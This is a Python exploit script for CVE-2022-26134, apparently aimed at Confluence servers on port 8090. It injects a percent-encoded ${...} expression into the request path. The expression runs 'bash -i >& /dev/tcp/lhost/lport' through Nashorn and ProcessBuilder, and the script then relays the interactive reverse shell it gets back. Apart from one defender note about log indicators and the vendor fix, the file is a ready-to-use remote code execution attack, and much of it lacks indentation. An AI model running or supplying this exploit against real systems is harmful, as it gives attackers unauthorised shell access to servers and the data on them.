CVE-2022-26134 rev shell
#!/usr/bin/python3
import os, sys, argparse, urllib.parse, socket, requests, time
# Build the encoded injection string whose effect, when evaluated by the
# target, is to run an interactive bash that connects back to lhost:lport.
# The shell text is the literal on the first body line; compile_payload()
# does the wrapping and percent-encoding.
#   lhost: listener address, inserted verbatim into the shell command
#   lport: listener port, inserted verbatim (the int() cast happens later,
#          in send_payload_and_listen)
#   returns: str, the percent-encoded path segment from compile_payload()
def revshell(lhost, lport):
command = f'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'
return compile_payload(command)
def get_target_url(rhost, rport):
    """Return the base URL for the target.

    If ``rhost`` already carries a scheme (it starts with ``http``), ``rport``
    is appended to it as given; otherwise ``http://`` is prefixed and the
    port is fixed at 8090 regardless of ``rport``.
    """
    has_scheme = rhost.startswith('http')
    if has_scheme:
        return f"{rhost}:{rport}"
    return f'http://{rhost}:8090'
# Wrap `command` in the expression that the target evaluates from the request
# path and percent-encode the whole thing. The caller (main block) appends
# the result directly to the URL from get_target_url().
#   command: shell command text spliced, unescaped, into a ProcessBuilder
#            call as the third argument of ['bash', '-c', command]
#   returns: str, the percent-encoded `/${...}/` path segment
# Defender note: on the wire this is a single GET whose URI path contains a
# URL-encoded `${` ... `}` segment naming javax.script.ScriptEngineManager,
# "nashorn" and java.lang.ProcessBuilder. Those literals (and a `${` in the
# path at all) are the indicators to search for in access logs and WAF
# telemetry; deploying the vendor fix for CVE-2022-26134 closes the
# injection point this relies on.
def compile_payload(command):
return urllib.parse.quote('/${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command(' + f"'bash','-c','{command}')" + '.start()")}/')
# Open a TCP listener on (lhost, lport), send the single GET that carries the
# injection, then relay an interactive session over the first accepted
# connection.
#   lhost: local address to bind the listener to
#   lport: local port; str or int (cast with int() below)
#   payload: despite the name, the complete target URL including the
#            encoded payload (see the call site in the main block)
#   returns: never on the normal path - the relay loop below has no exit
#            condition, so the function only ends via an exception
#            (e.g. KeyboardInterrupt). Neither socket is closed explicitly.
def send_payload_and_listen(lhost, lport, payload):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((lhost, int(lport)))
s.listen(1)
print("Listening on port " + str(lport))
# The listener is already up when the request goes out, so the callback
# cannot arrive before accept() is reachable. No timeout is passed, so this
# blocks for as long as the target takes to answer.
resp = requests.get(payload)
print(resp)
# Blocks until one peer connects; only this first connection is serviced.
conn, addr = s.accept()
print('Connection received from ', addr)
while True:
# One 1024-byte read per turn: longer output is not drained here, and a
# closed peer returns b"" (decoded to ""), which the loop does not check.
ans = conn.recv(1024).decode()
sys.stdout.write(ans)
command = input()
#Send command
command += "\n"
conn.send(command.encode())
time.sleep(1)
#Remove the output of the "input()" function
sys.stdout.write("\033[A" + ans.split("\n")[-1])
# Command-line interface: target (rhost/rport) and listener (lhost/lport).
# Only rport has a default (8090); the others are None when omitted.
parser = argparse.ArgumentParser(prog='CVE-2022-26134')
for _flag, _kwargs in (
    ('-rhost', {'help': 'Target host'}),
    ('-rport', {'default': 8090, 'help': 'Target port. Default: 8090'}),
    ('-lhost', {'help': 'Your IP'}),
    ('-lport', {'help': 'Your port'}),
):
    parser.add_argument(_flag, **_kwargs)
# Script entry point: parse the CLI, build and print the encoded payload,
# then deliver it and wait for the callback.
if __name__ == "__main__":
args = parser.parse_args()
# The guard uses `or`, so it only fires when lhost, rhost AND lport are all
# absent; a single missing argument passes through and surfaces later as
# the literal text "None" in the payload or as an exception (int(None) in
# bind(), None.startswith in get_target_url).
if not (args.lhost or args.rhost or args.lport):
parser.print_help(sys.stderr)
# Builtin exit() (provided by the site module) rather than sys.exit().
exit(1)
# `command` is the already percent-encoded path segment, not a shell string.
command = revshell(args.lhost, args.lport)
print(command)
# Third argument is the full URL: target base from get_target_url() plus
# the encoded payload.
send_payload_and_listen(args.lhost, args.lport, get_target_url(args.rhost, args.rport) + command)